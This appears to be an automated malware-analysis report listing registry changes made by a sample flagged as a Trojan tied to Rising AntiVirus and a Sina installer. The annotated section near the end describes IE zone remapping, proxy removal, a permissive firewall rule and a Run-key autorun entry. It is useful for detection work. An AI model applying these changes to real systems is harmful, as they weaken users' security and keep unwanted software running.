[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\MaxScanDeep]
"ver" = "2"
[HKLM\System\CurrentControlSet\Services\SysMon]
"AppProtect" = "11c176b2, 920e004c, 70ffc5d4"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\Default\JoinImprovementPlan]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\state]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\InsufficientSpaceHandleMethod]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rs_processes]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\antipromotionmon\intercept]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\SmartScan]
"ver" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\rising\RAV\cfgUn\PreventUninstallSwitch]
"PreventUninstallSwitch" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\verdict_vir_found]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Features\UrlLogging]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\Default\ProtectConfig\Password]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\JoinImprovementPlan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\Baidu]
"(Default)" = "14400"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\LargeFileHandleMethod]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\UseCloudDefence]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\app_filters]
"(Default)" = "2D 00 2D 00 74 00 79 00 70 00 65 00 3D 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"Publisher" = "Beijing Rising Information Technology, Inc."
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\scan_timeout]
"(Default)" = "30000"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\file_ext_filter]
"(Default)" = "VBS;VBE;JS;JSE;LSP;FAS;ASP;HTT;HTA;CSS;WSH;MHT;JSP;PHP;HTM;HTML;RB;LUA;PY;EXE;COM;SYS;VXD;DRV;DLL;BIN;OVL;386;FON;DOC;DOT;XLS;XLT;PPT;BAT;SCT;OCX;CPL;LNK;EML;NWS;PIF;SHS;MAI;SCR;ZIP;7Z;ARJ;BZ2;BZIP2;CAB;GZ;GZIP;HFS;ISO;LHA;LZH;LZMA;RAR;TAR;"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\PollingPath]
"(Default)" = ";"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\Default\UseCloudEngine]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\notify_timeout]
"(Default)" = "131072"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\AlertSound]
"(Default)" = "1"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcKind" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\func]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PackageSizeLimit]
"(Default)" = "0"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcInfo" = "1436411441"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services]
"Rising" = "Admin Test"
[HKLM\SOFTWARE\rising\RAV]
"Name" = "Rising AntiVirus 2012"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\Default\AutoEnterSilenceMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ScanResultCountPerPage]
"(Default)" = "268435455"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AutoTreatInfected]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayName" = "Rising Software Deployment System"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\scriptmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\WhiteList\TrustedFiles]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BackgroundScan\State]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\HTTP\EngDelay]
"(Default)" = "256"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\notify_timeout]
"(Default)" = "131072"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\app_filters]
"ver" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\autorun_disable_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\lockie]
"URL" = "aqceZAduQEZGXRpFB1pTQg4YQUFbQ0dES1wdVQ=="
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\QQMgr]
"(Default)" = "14400"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\UseAI]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\verdict_vir_found]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"URLInfoAbout" = "http://help.ikaka.com/"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\rising\lockie]
"LockTab" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\state]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\port_list]
"(Default)" = "110=110|25=120"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\app_filters]
"(Default)" = "00 00 00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\KeepDays]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\Default\CurrentWorkMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowAgent]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\verdict_vir_found]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\lockie]
"TabUrl" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBWEQWFRgMGEkVDBWy"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BackgroundScan\State]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowScanAd]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\CurrentWorkMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\REGO]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\writelog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\silent_competitor]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\pro_path]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\BaiduInterval]
"ver" = "2"
[HKLM\SOFTWARE\rising\lockie]
"Enable" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\BRScan]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Control Panel\Desktop]
"FontSmoothingType" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\SmartRelocate]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\app_filters]
"ver" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\UninstallProtect]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\notify_timeout]
"(Default)" = "131072"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowLogonIcon]
"(Default)" = "0"
[HKLM\System\CurrentControlSet\Services\SysMon]
"SrpProtect" = "11c176b2, 920e004c, 70ffc5d4"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 8E CA 3A D7 61 00 10 EA 85 EA E1 57 22 A0 4A"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Features\UrlLogging]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\protect_registries]
"(Default)" = "00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\homepageguard\state]
"ver" = "2"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Tag" = "4"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising\MimeType\application/x-rs-extension]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BackgroundScan\State]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\sites]
"ver" = "16"
[HKLM\System\CurrentControlSet\Services\sysmon\Instances\sysmon]
"Flags" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\whitemask]
"(Default)" = "25"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoBacore]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"InstallLocation" = "%Program Files%\Rising\RAV"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcDll" = "1468033841"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\verdict_vir_found]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\ProtectConfig\Password]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\System\CurrentControlSet\Services\SysMon]
"DependOnService" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\DenferTime]
"(Default)" = "255"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\exploit_scan_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\LargeFileHandleMethod]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\MaxScanDeep]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV]
"(Default)" = "Rising Software Deployment System"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\FileNameFilter]
"(Default)" = ".exe|.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\KillTroy\DelayCloud]
"(Default)" = "1280"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\Report]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\attach_scan_mode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\attach_scan_mode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\KillTroy\Radio]
"(Default)" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowLogonIcon]
"ver" = "2"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Adds a Windows Firewall rule that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Rising\RAV]
"RavMonD.exe" = "%Program Files%\Rising\RAV\ravmond.exe:*:Enabled:RAV Service"
The following driver will be automatically launched by the OS Loader:
[HKLM\System\CurrentControlSet\Services\SysMon]
"Start" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\System\CurrentControlSet\Services]
"Rising"
The process %original file name%.exe:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 6D 6D EC BF 34 ED 61 78 F2 A6 D8 8C 81 6E 0E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process RsMgrSvc.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 DD 3B EF 72 CA 10 6B 78 F6 92 8F CE 54 35 BB"
The process ravmond.exe:1328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 C8 C6 39 B4 25 F3 1C 00 C4 2D E8 EB 1F F4 C8"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\State]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services\kguard]
"stat" = "3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process ravmond.exe:1848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 20 BE D6 41 A3 F8 AB 80 E5 02 FE 1A 6E 8B F3"
The process SinaInstall_567015.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 5C 3B 67 03 DC D7 BA A9 20 F4 D9 63 0A 8B 2F"
The process SinaInstall_567015.exe:1296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015070920150710\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
